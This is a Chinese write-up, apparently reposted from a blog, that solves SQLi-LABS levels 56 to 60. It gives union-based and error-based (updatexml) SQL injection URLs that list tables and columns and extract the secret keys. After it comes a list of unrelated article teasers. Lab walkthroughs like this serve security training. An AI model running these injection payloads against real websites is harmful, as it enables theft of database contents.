SQLi-LABS靶场56-60通过攻略

SQLi-LABS靶场56-60通过攻略

news/2024/9/19 9:14:29/文章来源:https://blog.csdn.net/2401_82451607/article/details/141819447

less-56

1.判断注入点

?id=1' 页面不正常

2.判断闭合方式

?id=1') --+ 可以闭合成功

3.查看页面回显点

?id=-1')%20 union select 1,2,3--+

4.查询数据库名

?id=-1')%20 union select 1,database(),3--+

5.查询所有表

?id=-1')%20 union select 1,(select table_name from information_schema.tables where table_schema='challenges'),3--+

6.查询表的所有字段

?id=-1')%20 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='43kcrdhm86'),3--+

7.查询payload

?id=-1')%20 union select 1,(select group_concat(secret_N2VJ) from 43kcrdhm86),3--+

提交即可

less-57

这一关同上一关一样只是闭合方式不同这一关的闭合方式是双引号闭合

less-58

1.判断闭合方式

单引号可以闭合成功

2.查询数据库名

使用报错注入查询

?id=1' and updatexml(1,concat(1,database()),1)--+

3.查询所有表

?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+

4.查询表的所有字段

?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='oku1ceqf6n')),1)--+

5.查询payload

?id=1' and updatexml(1,concat(1,(select group_concat(secret_M0T5) from oku1ceqf6n)),1)--+

提交即可

less-59

这一关同上一关一样使用报错注入不同的是这一关是数字型注入闭合方式为整数型

less-60

1.判断闭合方式

?id=1") --+ 闭合方式为双引号加括号

2.查询数据库的所有表

因为题目中以及给了数据库所有直接查表即可

?id=1") and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)--+

3.查询表的所有字段

?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='cxnzzdty'),0x7e),1)--+

4.查询payload

?id=1") and updatexml(1,concat(0x7e,(select group_concat(secret_MB6W) from cxnzzdty),0x7e),1)--+’

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/414736.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

Spring security的SecurityConfig配置时 userDetailsService报错如何解决？

Spring security的SecurityConfig配置时 userDetailsService报错如何解决？

文章目录报错信息原因解决方案1. 实现 UserDetailsService 接口修改 IUsersService 接口和实现类 2. 修改 SecurityConfig3. 其他注意事项报错信息 ‘userDetailsService(T)’ in ‘org.springframework.security.config.annotation.authentication.builders.AuthenticationM…

阅读更多...

复习：虚析构函数(√)、纯虚析构函数(√)、虚构造函数(X)

复习：虚析构函数(√)、纯虚析构函数(√)、虚构造函数(X)

虚析构函数虚析构函数是为了解决基类的指针指向派生类对象，并用基类的指针删除派生类对象。 #include <bits/stdc.h> #include <cstdio> #include <cstring> #include <iostream> using namespace std;class Base { public:Base(){cout…

阅读更多...

银河麒麟v10-sp3 安装Tomcat10最新版

银河麒麟v10-sp3 安装Tomcat10最新版

tomcat官方地址---Apache Tomcat - Apache Tomcat 10 Software Downloads 下载这个即可 Core： 含义：Core代表Tomcat的核心程序，即Tomcat的正式二进制发布版本。这是大多数用户做开发或学习时应该下载的版本。用途：包含了Tomcat服…

阅读更多...

mysql的半同步模式

mysql的半同步模式

1.半同步模式原理 mysql的主备库通过binlog日志保持一致，主库本地执行完事务，binlog日志落盘后即返回给用户；备库通过拉取主库binlog日志来同步主库的操作。默认情况下，主库与备库并没有严格的同步，因此存在一定的概率…

阅读更多...

Python 生成随机的国内 ip

Python 生成随机的国内 ip

示例代码： import randomdef generate_random_cn_ip():# 中国大陆IP范围start_ip "36.54.0.0"end_ip "123.255.255.254"# 将IP地址转换为整数start_ip_num int(start_ip.replace(".", ""))end_ip_num int(end_ip.rep…

阅读更多...

Python日志重复？这里有终极解决方案！

Python日志重复？这里有终极解决方案！

文章目录 📖 介绍 📖🏡 演示环境 🏡📒 文章内容 📒📝 日志重复的常见原因📝 解决重复日志的策略📝 具体示例📝 日志重复问题的其他解决办法⚓️ 相关链接 ⚓️📖 介绍 📖 你是否曾经在调试Python程序时，发现同样的日志信息出现了两次甚至更多？这不仅…

阅读更多...

前端框架vue3中的条件渲染（v-show,v-if,v-else-if,v-else）

前端框架vue3中的条件渲染（v-show,v-if,v-else-if,v-else）

目录 v-show: 需求： v-if 区别与v-show： v-if和v-show的选择： v-else-if和v-else 联合使用： v-show: 部分代码如图： <body><div id"root"><div ><h1>n的值为{{n}}</h1>…

阅读更多...

新学期第一课

新学期第一课

文章目录一、加入课程QQ群（一）班级QQ群（二）入群要求二、加入学习通班级群（一）学习通班级群（二）手势签到三、使用思维导图工具（一）安装XMind（二…

阅读更多...

【QT | 开发环境搭建】Linux系统(Ubuntu 18.04) 安装 QT 5.12.12 开发环境

【QT | 开发环境搭建】Linux系统(Ubuntu 18.04) 安装 QT 5.12.12 开发环境

😁博客主页😁：🚀https://blog.csdn.net/wkd_007🚀 🤑博客内容🤑：🍭嵌入式开发、Linux、C语言、C、数据结构、音视频🍭 ⏰发布时间⏰： 2024-08-29 …

阅读更多...

Kotaemon：开源的RAG UI

Kotaemon：开源的RAG UI

检索增强生成 (RAG) 已成为一种改变游戏规则的方法，可增强大型语言模型的功能。Kotaemon 是由 Cinnamon 开发的开源项目，它站在这项创新的最前沿，提供了一个简洁、可定制且功能丰富的基于 RAG 的用户界面，用于与文档聊天。 Kotae…

阅读更多...

史记——我与历史的缘妙

史记——我与历史的缘妙

究天人之际，通古今之变，成一家之言。注解：这句话出自司马迁《史记》之《报任安书》。意思是通过“史实”现象揭示本质,探究自然现象和人类社会之间的相依相对关系。通晓从古到今的社会的各种发展演变,进而寻找历代王朝兴衰成败之道理。通过…

阅读更多...

Mysql剖析(三)----MySql的事务详解

Mysql剖析(三)----MySql的事务详解

事务（Transaction）：一般是指要做的或所做的事情。在计算机术语中是指访问并可能更新数据库中的各种数据项的一个程序执行单元（unit）。事务通常由高级数据库操纵语言或编程语言(如SQL、C或Java)书写的用户程序的执行所引…

阅读更多...

设施农业气象站

设施农业气象站

设施农业气象站的主要作用是为农业生产提供准确的气象数据和预测信息，以帮助农民科学决策和管理农业生产活动。具体作用包括： 提供准确的气象数据：设施农业气象站可以收集并记录气温、湿度、风速、降水量等多种气象信息，并确保数据…

阅读更多...

探索存储世界：TF卡与SD卡的奥秘

探索存储世界：TF卡与SD卡的奥秘

在这个数字化时代，数据存储变得至关重要。TF卡（TransFlash卡）和SD卡（Secure Digital卡）作为两种常见的存储介质，它们在我们的日常生活中扮演着重要角色。MK米客方德将带您深入了解TF卡的基本概念&#xff0…

阅读更多...

Python全网最全基础课程笔记-(一)基础入门

Python全网最全基础课程笔记-(一)基础入门

本专栏系列为Pythong基础系列，每天都会更新新的内容，搜罗全网资源以及自己在学习和工作过程中的一些总结，可以说是非常详细和全面。以至于为什么要写的这么详细：自己也是学过Python的，很多新手只是简单的过一篇语法&a…

阅读更多...

如何从 AWS CodeCommit 迁移到极狐GitLab？

如何从 AWS CodeCommit 迁移到极狐GitLab？

极狐GitLab 是 GitLab 在中国的发行版，可以私有化部署，对中文的支持非常友好，是专为中国程序员和企业推出的企业级一体化 DevOps 平台，一键就能安装成功。安装详情可以查看官网指南。本文将分享如何从 AWS CodeCommit 服务无缝迁…

阅读更多...

Gartner首次发布AI代码助手魔力象限，阿里云进入挑战者象限，通义灵码产品能力全面领先

Gartner首次发布AI代码助手魔力象限，阿里云进入挑战者象限，通义灵码产品能力全面领先

8月29日消息，国际市场研究机构Gartner发布业界首个AI代码助手魔力象限，全球共12家企业入围，阿里云成为唯一进入挑战者象限的中国科技公司。通义灵码在产品功能和市场应用等方面表现优秀，获得权威机构认可。该报告从技术创新性、产…

阅读更多...

webpack--处理资源

webpack--处理资源

在webpack.config.js中进行配置 const path require(path) module.exports {// 入口entry: ./src/main.js,// 输出output: {// 文件的输出路径path: path.resolve(__dirname, dist),// 入口文件打包输出的文件名filename: js/main.js,// 自动清空上次打包结果原理&#xff…

阅读更多...

Vidda电视X Ultra等加入能效补贴，京东天猫可买量大管饱

Vidda电视X Ultra等加入能效补贴，京东天猫可买量大管饱

近日，“能效补贴”成为热门话题。打算给家里更换一台大电视的朋友要留意了，Vidda旗下多款巨屏电视都已支持此次补贴政策，京东和天猫均可下单享受补贴。据「TMT星球」了解，Vidda是海信旗下的年轻科技潮牌，Vidda电视一…

阅读更多...

BugKu练习记录：小山丘的秘密

BugKu练习记录：小山丘的秘密

题目： hill能有什么秘密呢 bugku{PLGTGBQHM} 其中A1，flag全为小写hill解密，a1，所以z0，字母表为zabcdefghijklmnopqrstuvwxy，根据图片上的棋子数得到对应的字母，分别是abczadefz，用工…

阅读更多...

最新文章

推荐文章